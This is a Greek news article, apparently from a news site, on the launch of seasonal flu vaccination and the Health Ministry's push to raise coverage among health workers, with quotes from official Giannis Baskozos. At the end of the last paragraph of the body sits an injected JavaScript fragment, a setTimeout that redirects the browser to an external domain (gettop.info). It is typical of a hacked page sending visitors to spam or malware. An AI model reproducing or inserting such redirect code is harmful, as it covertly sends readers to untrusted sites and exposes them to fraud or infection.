Ξεκίνησε ο εμβολιασμός για την εποχική γρίπη – Ολα όσα πρέπει να γνωρίζετε

0
16

 

Ξεκίνησαν οι εμβολιασμοί για την εποχική γρίπη και όσοι ανήκετε σε ομάδες υψηλού κινδύνου πρέπει να κάνετε το αντιγριπικό εμβόλιο, το οποίο χορηγείται δωρεάν, διότι, όπως τονίζουν οι επιστήμονες, ο πιο αποτελεσματικός τρόπος προφύλαξης είναι ο έγκαιρος εμβολιασμός, ο οποίος συστήνεται να γίνεται κατά τους μήνες Οκτώβριο – Νοέμβριο, καθώς απαιτείται χρονική περίοδος 2 εβδομάδων για την ανάπτυξη αντισωμάτων.

«Κάθε επιδημική έξαρση της γρίπης εισβάλλει ταχύτατα, με αποτέλεσμα να είναι δύσκολη η πρόβλεψη του χρόνου, αλλά και του τόπου εκδήλωσής της» αναφέρει το Υπουργείο Υγείας, το οποίο φέτος δίνει ιδιαίτερη βαρύτητα και στον εμβολιασμό των επαγγελματιών υγείας, όπου παρατηρούνται πολύ χαμηλά ποσοστά εμβολιαστικής κάλυψης.

Την επόμενη εβδομάδα αναμένεται να ξεκινήσει καμπάνια ενημέρωσης για τον εμβολιασμό του ιατρονοσηλευτικού προσωπικού και όπως αναφέρει στο praktoreio-ygeias.gr, του ΑΠΕ-ΜΠΕ, ο γενικός γραμματέας Δημόσιας Υγείας Γιάννης Μπασκόζος, «φιλοδοξία μας είναι η εμβολιαστική κάλυψη των επαγγελματιών υγείας να αγγίξει το 25%, από 11% περίπου, που κυμάνθηκε πέρυσι».

Προκειμένου να διευκολυνθεί και να ολοκληρωθεί απρόσκοπτα ο εμβολιασμός των εργαζομένων συγκροτήθηκε στο Υπουργείο Υγείας Συντονιστική Επιτροπή, η οποία σε συνεργασία με το ΚΕΕΛΠΝΟ, τις Επιτροπές Νοσοκομειακών Λοιμώξεων, τον Νοσηλευτή Επιτήρησης Λοιμώξεων και τη Διοίκηση των Νοσοκομείων θα λάβει όλα τα απαραίτητα μέτρα με στόχο την αύξηση της εμβολιαστικής κάλυψης των εργαζομένων στις δομές υγείας.

Επιπλέον 20.000 εμβόλια, δωρεά της φαρμακοβιομηχανίας θα διατεθούν στις δομές του ΕΣΥ, προκειμένου οι εργαζόμενοι επιτόπου να εμβολιάζονται.

«Είναι ζήτημα κοινωνικής και επαγγελματικής ευθύνης, που μπορεί να γίνει και «εγκληματικό» για όσους καλούνται να παρέχουν νοσηλεία σε άτομα ανοσοκατεσταλμένα, σε ΜΕΘ, ασθενείς με ειδικές λοιμώξεις ή νεογνά και δεν εμβολιάζονται» δήλωσε ο κ. Μπασκόζος, επισημαίνοντας ότι «οι κλασικοί τρόποι προφύλαξης-μέτρα ατομικής υγιεινής -δεν είναι ποτέ αρκετοί για να εμποδίσουν την εξάπλωση της γρίπης και ο εμβολιασμός είναι ο μόνος τρόπος προφύλαξης».

Οι εργαζόμενοι στις υπηρεσίες υγείας βρίσκονται σε αυξημένο κίνδυνο να προσβληθούν από λοιμώξεις κατά την εργασία και να τις μεταδώσουν στους συναδέλφους, τους ασθενείς και τις οικογένειες τους.

Η ανοσοποίηση έναντι της γρίπης, του προσωπικού των φορέων παροχής υπηρεσιών υγείας, προστατεύει όχι μόνο τους εμβολιασμένους, αλλά λειτουργεί και ως φραγμός κατά της μετάδοσης της γρίπης και μάλιστα σε άτομα με αντένδειξη εμβολιασμού (π.χ. βρέφη κάτω των 6 μηνών, αλλεργικά άτομα κ.α.) ή με χαμηλή ανοσολογική απόκριση και συμβάλλει στην απρόσκοπτη διατήρηση της παροχής υγειονομικής περίθαλψης κατά τη διάρκεια της κορύφωσης της εποχικής γρίπης.

Ιδιαίτερα το προσωπικό των Μονάδων Εντατικής Θεραπείας συμπεριλαμβανομένων και των Μονάδων Νεογνών, των Μονάδων Αυξημένης Φροντίδας, των Μονάδων Ειδικών Λοιμώξεων, των ειδικών Μονάδων Ανοσοκατεσταλμένων και των Τμημάτων Επειγόντων Περιστατικών (ΤΕΠ) οφείλει να είναι στο σύνολό του εμβολιασμένο , ανέφερε ο κ. Μπασκόζος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here